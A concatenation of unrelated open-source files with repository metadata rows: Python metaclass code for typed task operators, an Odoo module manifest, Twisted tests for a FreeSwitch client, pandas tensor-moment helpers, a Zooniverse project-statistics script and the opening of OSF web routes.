# end class TypeCheckingDescriptor
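    # Net effect of the descriptor: every schema key gets type conversion on
    # assignment (including scalar -> list promotion for iterable types) and a
    # lazily created per-instance default on first read.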
@classmethod
def _setup_descriptors(cls, schema, clsdict):
"""Setup decriptoros to match the given schema. By default we create slots with the schema key
prefixed with underscore, and a descriptor at the place of the key for type verification and conversion
"""
slots = clsdict.get('__slots__')
assert isinstance(slots, (tuple, list)), '__slots__ must be present and tuple or instance'
slots = list(slots)
for key, value_type in schema.iteritems():
slot_var = cls.attr_prefix + key
assert slot_var not in slots, "meta class will add schema keys, you shouldn't do it explicitly"
slots.append(slot_var)
# Allow overrides !
assert key not in clsdict, "metaclass expects no customizations of attr access - try to subclass it"
clsdict[key] = cls.TypeCheckingDescriptor(key, value_type)
# end for each key
clsdict['__slots__'] = slots
def __new__(metacls, name, bases, clsdict):
"""Setup descriptors to facilitate and automate attribute access"""
alf_schema = clsdict.get('alf_schema')
if alf_schema:
for attr in ('options', 'mandatory_options'):
schema = getattr(alf_schema, attr)
if schema:
metacls._setup_descriptors(schema, clsdict)
# end check schema exists
# end for each attr
#end have schema
return Meta.__new__(metacls, name, bases, clsdict)
# end class AlfOperatorMeta
class AlfOperator(object):
"""A base class to help defininig operators"""
__slots__ = ()
__metaclass__ = AlfOperatorMeta
## A schema specifying attributes of the alf command
alf_schema = None
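
    # A concrete subclass would provide a schema object exposing 'options' and
    # 'mandatory_options' mappings of name -> type, e.g. (hypothetical sketch):
    #   class Task(AlfOperator):
    #       alf_schema = SomeSchema(mandatory_options={'title': str},
    #                               options={'subtasks': list})
    # after which Task('render') and Task(title='render') both type-check.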
def __init__(self, *args, **kwargs):
"""Initialize this instance with arguments matched against the mandatory and free options
@param args always matched to mandatory arguments.
If there is just one argument and it is a tuple or list, it will be interpreted as *args.
If it is a dict, it will be updating the possibly existing **kwargs.
@param kwargs matched to mandatory arguments first, then to actual options"""
assert self.alf_schema is not None, "subtype must set its alf_schema"
if len(args) == 1:
if isinstance(args[0], dict):
kwargs.update(args[0])
args = tuple()
elif isinstance(args[0], (tuple, list)):
args = args[0]
# end handle packing
# allow dicts as first arguments to support implicit type
args = list(args)
self._parse_mandatory_args(args, kwargs)
self._parse_options(kwargs)
assert len(args) == 0, "Unparsed arguments: %s" % (', '.join(args))
assert len(kwargs) == 0, "Unparsed kwargs: %s" % str(kwargs)
# -------------------------
## @name Subclass Overridable
# @{
def _set_attrs_from_dict(self, schema, kwargs):
"""Set our own attributes from keys and their values in kwargs if it is existing in schema.
Each match will be removed from kwargs.
@return set with matched keys"""
matched = set()
for key, value in kwargs.items():
if not key in schema:
continue
# let descriptor do the type checking
setattr(self, key, value)
del(kwargs[key])
matched.add(key)
# end for each key, value in kwargs
return matched
def _parse_options(self, kwargs):
"""Parse all optional arguments from the list of passed in key-value arguments"""
schema = self.alf_schema.options
if not schema:
return
self._set_attrs_from_dict(schema, kwargs)
def _parse_mandatory_args(self, args, kwargs):
"""Parse all mandatory arguments. If they are not matched in kwargs, they are obtained in order
from args"""
schema = self.alf_schema.mandatory_options
if not schema:
return
# parse named args
matched = self._set_attrs_from_dict(schema, kwargs)
# try to match remaining arguments one by one from args in order
for key in schema.keys():
if key in matched:
continue
if not args:
raise AssertionError("not enough arguments given to parse mandatory arguments - current key: %s" % key)
setattr(self, key, args.pop(0))
matched.add(key)
# end for each key in schema
remaining = set(schema.keys()) - matched
assert len(remaining) == 0, "didn't match the following mandatory arguments: %s" % (', '.join(remaining))
## -- End Subclass Overridable -- @}
# end class AlfOperator
class AlfTreeOperator(AlfOperator, GraphIterator):
"""An operator that sets up a tree of items.
As those items can refer to each other, there is a relation between id and refersto tags of commands and/or
tasks"""
__slots__ = ()
def __str__(self):
"""@return pretty version of self"""
return "%s(title='%s')" % (type(self).__name__, self.title)
# -------------------------
## @name GraphIterator Implementation
# @{
def _predecessors(self, node):
raise NotImplementedError()
def _successors(self, node):
if isinstance(node, AlfTreeOperator):
return node.subtasks
return list()
## -- End GraphIterator Implementation -- @}
# -------------------------
## @name Interface
# @{
def resolve_references(self):
"""Verify task and command relations for consistency, and resolve the Referal with the actual instance.
We also verify that task titles are unique per job
@note for now we only check for duplicate ids and task titles and for invalid references.
We also assume Job scope for IDs, not sub-tasks scope as described in the tractor docs to keep
the implementation simple. Therefore we are more enforcing than tractor, which could be a problem
if static task templates are to be duplicated.
        We would have to implement a recursive breadth-first iteration ourselves to handle the
        callbacks nicely.
        @note it's safe to call this multiple times, which will just update previous resolutions accordingly
@return self
@throws Exception if referrals are inconsistent"""
task_map = dict() # 'task title' => task instance
id_map = dict() # 'id' => Cmd or Task
idrefs = list() # a list of IDrefs or TaskIDRef to resolve
duplicate_tasks = list() # a list of tasks which have the same title
def add_to_idmap(item):
"""Adds given item to idmap but asserts that it doesn't exist there and that id is not None"""
if item.id is None:
return
assert item.id not in id_map, "Item %s has duplicate ID: '%s'" % (item, item.id)
id_map[item.id] = item
# end utility
def add_cmd_refs(cmds):
"""Adds idrefs from given commands to our maps and lists"""
for cmd in cmds:
add_to_idmap(cmd)
if cmd.refersto is not None:
idrefs.append(cmd.refersto)
# end for each command to handle
# end utility
# Need to delay import due to cycles ...
from .schema import IDRef
from .types import Instance, Task
# First, gather all items with an ID - for now we assume anything can point at anything
# Which is the case for Instances to tasks, but not for IDs
for item, level in self._iter_(self, self.downstream, self.breadth_first):
# This will iterate tasks and instances
if isinstance(item, Instance):
idrefs.append(item.taskref)
continue
# end handle instance
# Handle Task or Job
# Get commands
for cmd_attr in ('cleanup', 'cmds'):
cmds = getattr(item, cmd_attr, None)
if cmds:
add_cmd_refs(cmds)
# end for each command attr
if isinstance(item, Task):
# Its a task
add_to_idmap(item)
if item.title in task_map:
duplicate_tasks.append(item)
task_map[item.title] = item
# end handle task
# end for each iteration step
# At this point, we have no duplicate ids or titles, now resolve the references
for ref in idrefs:
if isinstance(ref, IDRef):
lut = id_map
else:
lut = task_map
# lazily flag the error only if it would be one
if len(duplicate_tasks) > 0:
msg = "The following duplicate tasks where found, Instance references would not be unique: "
msg += ', '.join(str(task) for task in duplicate_tasks)
raise AssertionError(msg)
# end handle duplicates
# end handle different reference types
assert ref.id in lut, "reference %s could not be found in lookup table - is there a spelling error?" % ref
ref.instance = lut[ref.id]
# end for each idref
return self
## -- End Interface -- @}
# end class AlfTreeOperator
## -- End Alf Base Classes -- @}
| lgpl-3.0 | 675,927,405,643,338,900 | 38.012461 | 119 | 0.558413 | false |
decodio/test_er | epps_reseller/__openerp__.py | 1 | 3639 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Odoo, Open Source Management Solution
#    This module copyright (C) 2015 Slobodni-programi d.o.o.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Epps Reseller Module',
'version': '8.0.1.0.0',
'author': 'Slobodni-programi d.o.o.',
    'maintainer': False,
    'website': False,
    'license': 'AGPL-3',
# any module necessary for this one to work correctly
'depends': [
'product',
'epps_project',
],
'external_dependencies': {
'python': [],
},
# Categories can be used to filter modules in modules listing
# Check https://github.com/odoo/odoo/blob/master/openerp/addons/base/module/module_data.xml # noqa
# for the full list
'category': 'EPPS Modules',
'summary': 'Epps common modules collection install via dependencies',
'description': """
.. image:: https://img.shields.io/badge/licence-AGPL--3-blue.svg
:target: http://www.gnu.org/licenses/agpl-3.0-standalone.html
:alt: License: AGPL-3
===========
Module name
===========
This module was written to extend the functionality of ... to support ...
and allow you to ...
Installation
============
To install this module, you need to:
* do this ...
Configuration
=============
To configure this module, you need to:
* go to ...
Usage
=====
To use this module, you need to:
* go to ...
.
Known issues / Roadmap
======================
* ...
Credits
=======
Contributors
------------
* Firstname Lastname <[email protected]>
Maintainer
----------
.. image:: https://odoo-community.org/logo.png
    :alt: Odoo Community Association
    :target: http://odoo-community.org
This module is maintained by the OCA.
OCA, or the Odoo Community Association, is a nonprofit organization whose
mission is to support the collaborative development of Odoo features and
promote its widespread use.
To contribute to this module, please visit http://odoo-community.org.
* Module exported by the Module Prototyper module for version 8.0.
* If you have any questions, please contact Savoir-faire Linux
([email protected])
""",
# always loaded
'data': [
'views/reseller_order_view.xml',
'views/partner_view.xml',
'data/reseller_order_sequence.xml',
'security/ir.model.access.csv',
],
# only loaded in demonstration mode
'demo': [
],
# used for Javascript Web Client Testing with QUnit / PhantomJS
# https://www.odoo.com/documentation/8.0/reference/javascript.html#testing-in-odoo-web-client # noqa
'js': [],
'css': [],
'qweb': [],
'installable': True,
# Install this module automatically if all dependency have been previously
# and independently installed. Used for synergetic or glue modules.
'auto_install': False,
'application': False,
}
| agpl-3.0 | 7,411,549,032,246,315,000 | 26.360902 | 105 | 0.622424 | false |
praekelt/vumi-freeswitch-esl | vxfreeswitch/tests/test_client.py | 1 | 10118 | """ Tests for vxfreeswitch.client. """
from zope.interface import implementer
from twisted.internet.interfaces import IStreamClientEndpoint
from twisted.internet.defer import inlineCallbacks, Deferred, fail, succeed
from twisted.internet.protocol import ClientFactory
from twisted.test.proto_helpers import StringTransportWithDisconnection
from twisted.python.failure import Failure
from twisted.trial.unittest import TestCase
from eventsocket import EventError
from vxfreeswitch.client import (
FreeSwitchClientProtocol, FreeSwitchClientFactory,
FreeSwitchClient, FreeSwitchClientReply, FreeSwitchClientError)
from vxfreeswitch.tests.helpers import FixtureApiResponse, FixtureReply
def connect_transport(protocol, factory=None):
""" Connect a StringTransport to a client protocol. """
if factory is None:
factory = ClientFactory()
transport = StringTransportWithDisconnection()
protocol.makeConnection(transport)
transport.protocol = protocol
protocol.factory = factory
return transport
@implementer(IStreamClientEndpoint)
class StringClientEndpoint(object):
""" Client endpoint that connects to a StringTransport. """
transport = None
def connect(self, factory):
try:
protocol = factory.buildProtocol("dummy-address")
self.transport = connect_transport(protocol, factory)
except Exception:
return fail()
return succeed(protocol)
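# StringClientEndpoint above stands in for a real TCP endpoint: connect()
# builds the protocol and wires it to an in-memory StringTransport, so tests
# can assert on exactly which bytes the client would have written.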
class TestFreeSwitchClientProtocol(TestCase):
def test_connected(self):
p = FreeSwitchClientProtocol(auth=None)
self.assertTrue(isinstance(p._connected, Deferred))
self.assertEqual(p._connected.called, False)
connect_transport(p)
self.assertEqual(p._connected.called, True)
self.assertEqual(p._connected.result, p)
def test_auth(self):
p = FreeSwitchClientProtocol(auth="pw-12345")
tr = connect_transport(p)
self.assertEqual(tr.value(), "auth pw-12345\n\n")
def test_no_auth(self):
p = FreeSwitchClientProtocol(auth=None)
tr = connect_transport(p)
self.assertEqual(tr.value(), "")
class TestFreeSwitchClientFactory(TestCase):
def test_subclasses_client_factory(self):
f = FreeSwitchClientFactory()
self.assertTrue(isinstance(f, ClientFactory))
def test_protocol(self):
f = FreeSwitchClientFactory()
p = f.protocol()
self.assertTrue(isinstance(p, FreeSwitchClientProtocol))
def test_default_noisy(self):
f = FreeSwitchClientFactory()
self.assertEqual(f.noisy, False)
def test_set_noisy(self):
f = FreeSwitchClientFactory(noisy=True)
self.assertEqual(f.noisy, True)
def test_no_auth(self):
f = FreeSwitchClientFactory()
p = f.protocol()
tr = connect_transport(p)
self.assertEqual(tr.value(), "")
def test_auth(self):
f = FreeSwitchClientFactory(auth="pw-1234")
p = f.protocol()
tr = connect_transport(p)
self.assertEqual(tr.value(), "auth pw-1234\n\n")
class TestFreeSwitchClientError(TestCase):
def test_subclasses_exception(self):
err = FreeSwitchClientError("foo")
self.assertTrue(isinstance(err, Exception))
def test_str(self):
err = FreeSwitchClientError("reason")
self.assertEqual(str(err), "reason")
class TestFreeSwitchClientReply(TestCase):
def test_args(self):
reply = FreeSwitchClientReply("a", "b")
self.assertEqual(reply.args, ("a", "b"))
def test_repr(self):
self.assertEqual(
repr(FreeSwitchClientReply("a", "c")),
"<FreeSwitchClientReply args=('a', 'c')>")
def test_equal(self):
self.assertEqual(
FreeSwitchClientReply("a", "b"),
FreeSwitchClientReply("a", "b"))
def test_not_equal(self):
self.assertNotEqual(
FreeSwitchClientReply("a", "b"),
FreeSwitchClientReply("a", "c"))
def test_not_equal_other_object(self):
self.assertNotEqual(
FreeSwitchClientReply("a", "b"),
object())
class TestFreeSwitchClient(TestCase):
def mk_client(self, endpoint=None, auth=None):
return FreeSwitchClient(endpoint=endpoint, auth=auth)
def test_fallback_error_handler_client_error(self):
client = self.mk_client()
failure = Failure(FreeSwitchClientError("reason"))
self.assertEqual(
client.fallback_error_handler(failure), failure)
def test_fallback_error_handler_other_error(self):
client = self.mk_client()
failure = Failure(Exception("reason"))
err = self.failUnlessRaises(
FreeSwitchClientError,
client.fallback_error_handler, failure)
self.assertEqual(str(err), "reason")
def test_event_error_handler_event_error_has_reply(self):
client = self.mk_client()
failure = Failure(EventError({"Reply_Text": "+ERROR eep"}))
err = self.failUnlessRaises(
FreeSwitchClientError,
client.event_error_handler, failure)
self.assertEqual(str(err), "+ERROR eep")
def test_event_error_handler_event_error_no_reply(self):
client = self.mk_client()
failure = Failure(EventError({"Not_Reply": "foo"}))
err = self.failUnlessRaises(
FreeSwitchClientError,
client.event_error_handler, failure)
self.assertEqual(str(err), "{'Not_Reply': 'foo'}")
def test_event_error_handler_other_error(self):
client = self.mk_client()
failure = Failure(Exception("reason"))
self.assertEqual(
client.event_error_handler(failure), failure)
def test_request_callback_with_reply(self):
client = self.mk_client()
self.assertEqual(
client.request_callback({'Reply_Text': 'a b'}),
FreeSwitchClientReply('a', 'b'))
def test_request_callback_without_reply(self):
client = self.mk_client()
self.assertEqual(
client.request_callback({}),
FreeSwitchClientReply())
def test_api_request_callback_with_okay_response(self):
client = self.mk_client()
self.assertEqual(
client.api_request_callback({
'data': {
'rawresponse': '+OK meep moop'
}
}),
FreeSwitchClientReply('+OK', 'meep', 'moop'))
def test_api_request_callback_with_error_response(self):
client = self.mk_client()
err = self.failUnlessRaises(
FreeSwitchClientError,
client.api_request_callback, {
'data': {
'rawresponse': '+ERROR meep moop'
}
})
self.assertEqual(str(err), "+ERROR meep moop")
def test_api_request_callback_without_data(self):
client = self.mk_client()
err = self.failUnlessRaises(
FreeSwitchClientError,
client.api_request_callback, {
'foo': 'bar',
})
self.assertEqual(str(err), "{'foo': 'bar'}")
def test_api_request_callback_without_rawresponse(self):
client = self.mk_client()
err = self.failUnlessRaises(
FreeSwitchClientError,
client.api_request_callback, {
'data': {}
})
self.assertEqual(str(err), "{'data': {}}")
@inlineCallbacks
def test_with_connection(self):
endpoint = StringClientEndpoint()
client = self.mk_client(endpoint=endpoint)
f_called = Deferred()
def f(conn):
wait = Deferred()
f_called.callback((wait, conn))
return wait
d = client.with_connection(f)
self.assertEqual(endpoint.transport.connected, True)
self.assertEqual(endpoint.transport.value(), "")
self.assertTrue(isinstance(d.result, Deferred))
f_wait, f_conn = yield f_called
self.assertTrue(isinstance(f_conn, FreeSwitchClientProtocol))
self.assertTrue(isinstance(d.result, Deferred))
self.assertEqual(f_wait.called, False)
f_wait.callback({'foo': 'bar'})
reply = yield d
self.assertEqual(reply, {'foo': 'bar'})
self.assertEqual(endpoint.transport.value(), "")
self.assertEqual(endpoint.transport.connected, False)
@inlineCallbacks
def test_api(self):
endpoint = StringClientEndpoint()
client = self.mk_client(endpoint=endpoint)
d = client.api("foo")
self.assertEqual(endpoint.transport.value(), "api foo\n\n")
self.assertEqual(endpoint.transport.connected, True)
endpoint.transport.protocol.dataReceived(
FixtureApiResponse("+OK moo").to_bytes())
result = yield d
self.assertEqual(result, FreeSwitchClientReply("+OK", "moo"))
self.assertEqual(endpoint.transport.value(), "api foo\n\n")
self.assertEqual(endpoint.transport.connected, False)
@inlineCallbacks
def test_auth(self):
endpoint = StringClientEndpoint()
client = self.mk_client(endpoint=endpoint, auth="kenny")
f_called = Deferred()
def f(conn):
wait = Deferred()
f_called.callback((wait, conn))
return wait
d = client.with_connection(f)
self.assertEqual(endpoint.transport.value(), "auth kenny\n\n")
self.assertEqual(endpoint.transport.connected, True)
self.assertEqual(f_called.called, False)
self.assertTrue(isinstance(d.result, Deferred))
endpoint.transport.protocol.dataReceived(
FixtureReply("+OK").to_bytes())
f_wait, f_conn = yield f_called
self.assertTrue(isinstance(f_conn, FreeSwitchClientProtocol))
self.assertEqual(f_wait.called, False)
f_wait.callback({"foo": "bar"})
reply = yield d
self.assertEqual(reply, {"foo": "bar"})
self.assertEqual(endpoint.transport.value(), "auth kenny\n\n")
self.assertEqual(endpoint.transport.connected, False)
| bsd-3-clause | -8,122,824,378,007,507,000 | 33.06734 | 75 | 0.631251 | false |
fthoele/tensormoments | tensormoments/tools.py | 1 | 5153 | import pandas as pd
import numpy as np
from operator import and_
from six import iteritems
from functools import reduce
import warnings
def transformGroupToReal(dataframe):
""" Takes a dataframe and transforms the groups in it to a real representation.
Args:
        dataframe: pandas DataFrame holding one (2l+1)-row group, with columns 't' and 'value'.
Returns:
A copy of the old dataframe, containing the transformed elements.
"""
warnings.warn("Use new transformation transform_group_to_real", DeprecationWarning )
mult = len(dataframe)
l = int((mult-1)/2)
newDataframe = dataframe.copy()
for m in range(-l,l+1):
valPositive = dataframe.loc[dataframe.t == m, 'value'].values[0]
valNegative = dataframe.loc[dataframe.t == -m, 'value'].values[0]
if m < 0:
newValue = (valPositive - ((-1)**m) *valNegative) * 1j/np.sqrt(2)
elif m > 0:
newValue = (valNegative + ((-1)**m) * valPositive) * 1./np.sqrt(2)
else:
newValue = valPositive
newDataframe.loc[newDataframe.t == m, "value"] = newValue
return newDataframe
def filterTmoms(df, **kwargs):
""" Returns all tensor moments to which the filter arguments in kwargs apply.
Keys are: atom, species, nu, l1, l2, k, p, r, t
"""
labels = list(df)
filters = []
for key, value in iteritems(kwargs):
if key in labels:
filters.append(df[key] == value)
if filters:
finalFilter = reduce(and_, filters)
return df.loc[finalFilter]
else:
return df
def transformFrameToReal(dataframe):
""" Transforms the given dataframe to the real spherical harmonic basis.
"""
warnings.warn("Use new transformation function transform_to_real", DeprecationWarning)
grouped = dataframe.groupby(['k','p','r', 'atom', 'species','nu', 'l1', 'l2'])
realList = []
for name, group in grouped:
newGroup = transformGroupToReal(group)
realList.append(newGroup)
realdf = pd.concat(realList)
return realdf
def transform_to_real(dataframe):
""" Improved version of the transformation. Takes dataframe, and transforms all pairs of (t, v) to their real representation.
Args:
dataframe:
Returns:
A dataframe with all pairs transformed to real.
"""
columns = list(dataframe)
columns.remove("t")
columns.remove("value")
grouped = dataframe.groupby(columns)
realList = []
    for name, group in grouped:
newGroup = transform_group_to_real(group, columns, name)
realList.extend(newGroup)
realdf = pd.DataFrame(realList)
return realdf
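# Example shape of the transformation (hypothetical group): rows with
# t = -1, 0, +1 and complex 'value' entries come back as three rows carrying
# 'value_real'/'value_imag' in the real spherical-harmonic basis.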
def transform_group_to_real(g, group_columns, group_values):
""" Helper method that transforms one group of values.
Args:
g: The group dataframe obtained by the groupby operation.
group_columns: The columns used for grouping.
group_values: The values of the grouping columns for this transformation operation.
Returns:
A list of dicts, each dict containing a row in the dataframe.
"""
prototype = {k: v for (k, v) in zip(group_columns, group_values)}
mult = len(g)
l = int((mult - 1) / 2)
sorted_g = g.sort_values("t")
sorted_values = sorted_g.value.as_matrix()
results = []
for m in range(-l, l + 1):
valPositive = sorted_values[m + l]
valNegative = sorted_values[-m + l]
if m < 0:
newValue = (valPositive - ((-1) ** m) * valNegative) * 1j / np.sqrt(2)
elif m > 0:
newValue = (valNegative + ((-1) ** m) * valPositive) * 1. / np.sqrt(2)
else:
newValue = valPositive
# newValue = np.real(newValue)
result_dict = prototype.copy()
result_dict['value_real'] = np.real(newValue)
result_dict['value_imag'] = np.imag(newValue)
result_dict['t'] = m
results.append(result_dict)
return results
def insert_vectors_into_vesta(vectors, vesta_template_file, vector_scale=1.0,
template_string_vectt="{VECTT}", template_string_vectr="{VECTR}",
template_string_vects="{VECTS}"):
""" Replaces template string in a vesta file with the correct representation for a number of vectors.
Args:
        vectors: iterable of vectors with at least 3 components each.
        vesta_template_file: path to a VESTA file containing the placeholder strings.
        template_string_vectt: placeholder replaced by the vector type (VECTT) block.
        template_string_vectr: placeholder replaced by the vector data (VECTR) block.
        template_string_vects: placeholder replaced by the vector scale (VECTS) value.
    Returns:
        The template text with the VECTR, VECTT and VECTS placeholders substituted.
"""
vectors = np.array(vectors)
if vectors.shape[1] < 3:
raise ValueError("Not enough y dimensions in input data")
vectr = ""
vectt = ""
for ivect, vector in enumerate(vectors, start=1):
vectr += " {} {} {} {} 0\n".format(ivect, *vector)
vectr += " {} 0 0 0 0\n".format(ivect)
vectr += "0 0 0 0 0\n"
vectt += " {} 0.500 255 0 0 1\n".format(ivect)
with open(vesta_template_file) as fp:
text = fp.read()
text = text.replace(template_string_vectr, vectr)
text = text.replace(template_string_vectt, vectt)
text = text.replace(template_string_vects, f"{vector_scale:8.3f}")
return text | mit | -5,701,005,479,903,698,000 | 30.619632 | 129 | 0.605473 | false |
vrooje/panoptes_analysis | basic_project_stats.py | 1 | 8792 | #Python 2.7.9 (default, Apr 5 2015, 22:21:35)
import sys
# file with raw classifications (csv)
# put this way up here so if there are no inputs we exit quickly before even trying to load everything else
try:
classfile_in = sys.argv[1]
except:
#classfile_in = 'data/2e3d12a2-56ca-4d1f-930a-9ecc7fd39885.csv'
print "\nUsage: "+sys.argv[0]+" classifications_infile"
print " classifications_infile is a Zooniverse (Panoptes) classifications data export CSV."
print "\nAll output will be to stdout (about a paragraph worth).\n"
sys.exit(0)
import numpy as np # using 1.10.1
import pandas as pd # using 0.13.1
#import datetime
#import dateutil.parser
import json
# columns currently in an exported Panoptes classification file:
# classification_id,user_name,user_id,user_ip,workflow_id,workflow_name,workflow_version,created_at,gold_standard,expert,metadata,annotations,subject_data
# classification_id identifies the specific classification - should be unique for each row in this file
# user_name is either their registered name or "not-logged-in"+their hashed IP
# user_id is their numeric Zooniverse ID or blank if they're unregistered
# user_ip is a hashed version of their IP
# workflow_id is the numeric ID of this workflow, which you can find in the project builder URL for managing the workflow:
# https://www.zooniverse.org/lab/[project_id]/workflow/[workflow_id]/
# workflow_name is the name you gave your workflow (for sanity checks)
# workflow_version is [bigchangecount].[smallchangecount] and is probably pretty big
# created_at is the date the entry for the classification was recorded
# gold_standard is 1 if this classification was done in gold standard mode
# expert is 1 if this classification was done in expert mode... I think
# metadata (json) is the data the browser sent along with the classification.
# Includes browser information, language, started_at and finished_at
# note started_at and finished_at are perhaps the easiest way to calculate the length of a classification
# (the duration elapsed between consecutive created_at by the same user is another way)
# the difference here is back-end vs front-end
# annotations (json) contains the actual classification information
# which for this analysis we will ignore completely, for now
# subject_data is cross-matched from the subjects table and is for convenience in data reduction
# here we will ignore this too, except to count subjects once.
# we'll also ignore classification_id, user_ip, workflow information, gold_standard, and expert.
#
# some of these will be defined further down, but before we actually use this list.
#cols_used = ["created_at_ts", "user_name", "user_id", "created_at", "started_at", "finished_at"]
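# (For reference, a per-classification duration column could be derived from
#  these metadata timestamps -- a sketch, not used below:
#    classifications['duration'] = (pd.to_datetime(classifications.finished_at_str)
#                                   - pd.to_datetime(classifications.started_at_str))
#  assuming the started_at/finished_at strings parse cleanly.)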
# Print out the input parameters just as a sanity check
print "Computing project stats using:"
print " infile:",classfile_in
#################################################################################
#################################################################################
#################################################################################
# Get the Gini coefficient - https://en.wikipedia.org/wiki/Gini_coefficient
#
# The Gini coefficient measures inequality in distributions of things.
# It was originally conceived for economics (e.g. where is the wealth in a country?
# in the hands of many citizens or a few?), but it's just as applicable to many
# other fields. In this case we'll use it to see how classifications are
# distributed among classifiers.
# G = 0 is a completely even distribution (everyone does the same number of
# classifications), and ~1 is uneven (~all the classifications are done
# by one classifier).
# Typical values of the Gini for healthy Zooniverse projects (Cox et al. 2015) are
# in the range of 0.7-0.9.
# That range is generally indicative of a project with a loyal core group of
# volunteers who contribute the bulk of the classification effort, but balanced
# out by a regular influx of new classifiers trying out the project, from which
# you continue to draw to maintain a core group of prolific classifiers.
# Once your project is fairly well established, you can compare it to past Zooniverse
# projects to see how you're doing.
# If your G is << 0.7, you may be having trouble recruiting classifiers into a loyal
# group of volunteers. People are trying it, but not many are staying.
# If your G is > 0.9, it's a little more complicated. If your total classification
# count is lower than you'd like it to be, you may be having trouble recruiting
# classifiers to the project, such that your classification counts are
# dominated by a few people.
# But if you have G > 0.9 and plenty of classifications, this may be a sign that your
# loyal users are -really- committed, so a very high G is not necessarily a bad thing.
#
# Of course the Gini coefficient is a simplified measure that doesn't always capture
# subtle nuances and so forth, but it's still a useful broad metric.
def gini(list_of_values):
sorted_list = sorted(list_of_values)
height, area = 0, 0
for value in sorted_list:
height += value
area += height - value / 2.
    fair_area = height * len(list_of_values) / 2.
return (fair_area - area) / fair_area
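# Quick sanity checks (hypothetical classification counts):
#   gini([25, 25, 25, 25]) == 0.0   # perfectly even effort
#   gini([0, 0, 0, 100])   == 0.75  # one person does everything; the maximum
#                                   # for n classifiers is (n - 1) / n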
#################################################################################
#################################################################################
#################################################################################
# Begin the main stuff
print "Reading classifications from "+classfile_in
classifications = pd.read_csv(classfile_in)
# first, extract the started_at and finished_at from the annotations column
classifications['meta_json'] = [json.loads(q) for q in classifications.metadata]
classifications['started_at_str'] = [q['started_at'] for q in classifications.meta_json]
classifications['finished_at_str'] = [q['finished_at'] for q in classifications.meta_json]
classifications['created_day'] = [q[:10] for q in classifications.created_at]
first_class_day = min(classifications.created_day).replace(' ', '')
last_class_day = max(classifications.created_day).replace(' ', '')
# grab the subject counts
n_subj_tot = len(classifications.subject_data.unique())
by_subject = classifications.groupby('subject_data')
subj_class = by_subject.created_at.aggregate('count')
# basic stats on how classified the subjects are
subj_class_mean = np.mean(subj_class)
subj_class_med = np.median(subj_class)
subj_class_min = np.min(subj_class)
subj_class_max = np.max(subj_class)
# save processing time and memory in the groupby.apply(); only keep the columns we're going to use
#classifications = classifications[cols_used]
# index by created_at as a timeseries
# note: this means things might not be uniquely indexed
# but it makes a lot of things easier and faster.
# update: it's not really needed in the main bit, but will do it on each group later.
#classifications.set_index('created_at_ts', inplace=True)
all_users = classifications.user_name.unique()
by_user = classifications.groupby('user_name')
# get total classification and user counts
n_class_tot = len(classifications)
n_users_tot = len(all_users)
unregistered = [q.startswith("not-logged-in") for q in all_users]
n_unreg = sum(unregistered)
n_reg = n_users_tot - n_unreg
# for the leaderboard, which I recommend project builders never make public because
# Just Say No to gamification
# But it's still interesting to see who your most prolific classifiers are, and
# e.g. whether they're also your most prolific Talk users
nclass_byuser = by_user.created_at.aggregate('count')
nclass_byuser_ranked = nclass_byuser.copy()
nclass_byuser_ranked.sort(ascending=False)
# very basic stats
nclass_med = np.median(nclass_byuser)
nclass_mean = np.mean(nclass_byuser)
# Gini coefficient - see the comments above the gini() function for more notes
nclass_gini = gini(nclass_byuser)
print "\nOverall:\n\n",n_class_tot,"classifications of",n_subj_tot,"subjects by",n_users_tot,"classifiers,"
print n_reg,"registered and",n_unreg,"unregistered.\n"
print "That's %.2f classifications per subject on average (median = %.1f)." % (subj_class_mean, subj_class_med)
print "The most classified subject has ",subj_class_max,"classifications; the least-classified subject has",subj_class_min,".\n"
print "Median number of classifications per user:",nclass_med
print "Mean number of classifications per user: %.2f" % nclass_mean
print "\nTop 10 most prolific classifiers:\n",nclass_byuser_ranked.head(10)
print "\n\nGini coefficient for classifications by user: %.2f\n" % nclass_gini
# That's it. This program is very basic.
| gpl-2.0 | 2,390,939,211,970,713,600 | 43.857143 | 154 | 0.704163 | false |
HalcyonChimera/osf.io | website/routes.py | 1 | 55026 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import httplib as http
import requests
import urlparse
import waffle
import json
from flask import request
from flask import send_from_directory
from flask import Response
from flask import stream_with_context
from flask import g
from django.core.urlresolvers import reverse
from django.conf import settings as api_settings
from geolite2 import geolite2
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from osf import features
from osf.models import Institution
from osf.utils import sanitize
from website import util
from website import prereg
from website import settings
from website import language
from website.util import metrics
from website.util import paths
from website import maintenance
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from addons.osfstorage import views as osfstorage_views
from website.profile.utils import get_profile_image_url
from website.profile import views as profile_views
from website.project import views as project_views
from addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.preprints import views as preprint_views
from website.registries import views as registries_views
from website.reviews import views as reviews_views
from website.institutions import views as institution_views
from website.notifications import views as notification_views
from website.ember_osf_web import views as ember_osf_web_views
from website.closed_challenges import views as closed_challenges_views
from website.identifiers import views as identifier_views
from website.settings import EXTERNAL_EMBER_APPS, EXTERNAL_EMBER_SERVER_TIMEOUT
def set_status_message(user):
if user and not user.accepted_terms_of_service:
status.push_status_message(
message=language.TERMS_OF_SERVICE.format(api_domain=settings.API_DOMAIN,
user_id=user._id,
csrf_token=json.dumps(g.get('csrf_token'))),
kind='default',
dismissible=True,
trust=True,
jumbotron=True,
id='terms_of_service',
extra={}
)
def get_globals():
"""Context variables that are available for every template rendered by
    OsfWebRenderer.
"""
user = _get_current_user()
set_status_message(user)
